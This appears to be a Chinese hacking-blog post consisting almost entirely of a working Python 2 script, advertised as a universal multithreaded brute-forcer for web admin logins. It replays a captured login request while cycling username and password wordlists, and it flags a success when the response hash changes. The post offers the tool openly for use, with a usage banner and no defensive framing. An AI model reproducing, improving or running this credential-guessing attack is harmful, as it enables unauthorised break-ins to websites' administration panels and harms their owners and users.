python版通用后台账号密码多线程爆破必杀器

#! /usr/bin/env python2.7
#coding=utf-8
#通用后台账号密码多线程爆破必杀器


import re
import os
import sys
import gzip
import Queue
import getopt
import msvcrt
import urllib
import httplib
import hashlib
import urllib2
import StringIO
import threading


class hackcrack(threading.Thread):
    def __init__(self,ooldmd5,uuu,ppp):
        threading.Thread.__init__(self)
        self.ooldmd5 = ooldmd5
        self.uuu = uuu
        self.ppp = ppp
    def run(self):
        while 1:
            if queue.empty() == True:
                break
            self.crack(self.ooldmd5,self.uuu,self.ppp)
    def crack(self,ooldmd5,uuu,ppp):
        data = queue.get()
        pathes = path()
        headerses = headers()
        arg = host()
        m = re.compile('%s=(.*?)&' % uuu)
        n = re.compile('%s=(.*?)&' % ppp)     
        us = m.findall(data)
        pw = n.findall(data)   
        conn = httplib.HTTPConnection(arg)
        try:
            conn.request('POST',pathes,data,headerses)
            httpres = conn.getresponse()
            
            if ('content-encoding', 'gzip') in httpres.getheaders():
                compressedstream = StringIO.StringIO(httpres.read())  
                gzipper = gzip.GzipFile(fileobj=compressedstream)     
                ccode = gzipper.read()
            else:
                ccode = httpres.read()
            if ccode:
                newmd5 = hashlib.md5(ccode).hexdigest()
            else:
                newmd5 = hashlib.md5('mdbhack').hexdigest()
            if ooldmd5 != newmd5:
                print '\n http://%s' % arg
                print ' http://%s%s' % (arg,pathes)
                print ' I Find It -------->username:%s password:%s<--------' % (us[0],pw[0])
                print ccode
                os._exit(1)
            else:
                print '[%s] hacking -------->username:%s password:%s' % (queue.qsize(),us[0],pw[0])
                #print ccode
        except:
            pass        

class ThreadGetKey(threading.Thread):
    def run(self):
        try:           
            chr = msvcrt.getch()
            if chr == 'q':
                print "stopped by your action ( q )"
                os._exit(1)
        except:
            os._exit(1)



def info():
    print '''
     ,--^----------,--------,-----,-------^--,
     | |||||||||   `--------'     |          O ..
     `+---------------------------^----------|
       `\_,-------, ___@ mdbhack#QQ.com______|
         / XXXXXX /`|     /
        / XXXXXX /  `\   /
       / XXXXXX /\______(
      / XXXXXX /        
     / XXXXXX /
    (________(    For example:
     `------'         crack.py -u username -p password
    
    '''


def path():
    f = open('headers.txt','r')
    for p in f:
        if 'POST' in p:
            path = p.split(' ')[1].strip()
            #print path
            return path
def headers():
    headers = {}
    hheader = ['Host','User-Agent','Accept','Accept-Language','Accept-Encoding','Referer','Cookie','Connection','Content-Type']
    f = open('headers.txt','r')
    for p in f:
        for hh in hheader:
            if hh in p:
                headers[hh] = p.split(':',1)[1].strip()    
    return headers
def host():
    f = open('headers.txt','r')
    for p in f:
        if 'Host' in p:
            arg = p.split(':')[1].strip()
    #print arg
    return arg

def testcrack(username,password):
    pathes = path()
    arg = host()
    headerses = headers()
    
    getusername = username
    getpassword = password
    f = open('headers.txt','r')
    for xxx in f:
        if '&' in xxx and '=' in xxx:
            getdata = xxx.strip()  
    getpw = re.compile('%s=(.*?)&' % password)
    getusern = re.compile('%s=(.*?)&' % username)    
    bb = getpw.sub('%s=%s&' % (password,'mdbhackcom'),getdata)
    data = getusern.sub('%s=%s&' % (username,'mdbhack'),bb)
    conn = httplib.HTTPConnection(arg)
    conn.request('POST',pathes,data,headerses)
    httpres = conn.getresponse()
    if ('content-encoding', 'gzip') in httpres.getheaders():
        compressedstream = StringIO.StringIO(httpres.read())  
        gzipper = gzip.GzipFile(fileobj=compressedstream)     
        code = gzipper.read()
    else:
        code = httpres.read()
    if code:
        oldmd5 = hashlib.md5(code).hexdigest()
    else:
        oldmd5 = hashlib.md5('mdbhack').hexdigest()
    
    return oldmd5
    
def crack(username,password):
    global queue,ooldmd5
    threads = []
    line = 5
    queue = Queue.Queue()
    pathes = path()
    arg = host()
    ooldmd5 = testcrack(username,password)
    headerses = headers()
    f = open('headers.txt','r')
    for xxx in f:
        if '&' in xxx and '=' in xxx:
            getdata = xxx.strip()
    for us in open('username.txt','r'):
        print ' Scan Username is %s ' % us.strip()
        for pw in open('password.txt','r'):
            getpw = re.compile('%s=(.*?)&' % password)
            getusern = re.compile('%s=(.*?)&' % username)
            bb = getpw.sub('%s=%s&' % (password.strip(),urllib2.quote(pw.strip())),getdata)
            data = getusern.sub('%s=%s&' % (username,urllib2.quote(us.strip())),bb)
            queue.put(data)



        shouhu = ThreadGetKey()
        shouhu.setDaemon(True)
        shouhu.start()
        
        for x in range(line):
            y = hackcrack(ooldmd5,username,password)
            y.start()
            threads.append(y)
        for x in threads:
            x.join()
        
        
    

if __name__ == '__main__':
    if len(sys.argv) == 5:
        f = open('headers.txt','r')
        for xxx in f:
            if '&' in xxx and '=' in xxx:
                getdata = xxx.strip()        
        try:
            opts, args = getopt.getopt (sys.argv[1:], "u:p:")#Assigning Parameters
        except:
            info()
            sys.exit(1)
        for opt,arg in opts:#Traversal
            if opt == '-u':
                if arg.strip() in getdata:
                    username = arg.strip()
                else:
                    print '\nusername table %s is Wrong' % arg.strip()
                    username = ''
            elif opt == '-p':
                if arg.strip() in getdata:
                    password = arg.strip()
                else:
                    print 'password table %s is Wrong' % arg.strip()
                    password = ''
            else:
                info()
                sys.exit(1)
        if username and password:
            crack(username,password)
        else:
            sys.exit(1)
        
    else:
        info()
        sys.exit(1)

你可能感兴趣的:(Hacking,T00ls,爆破)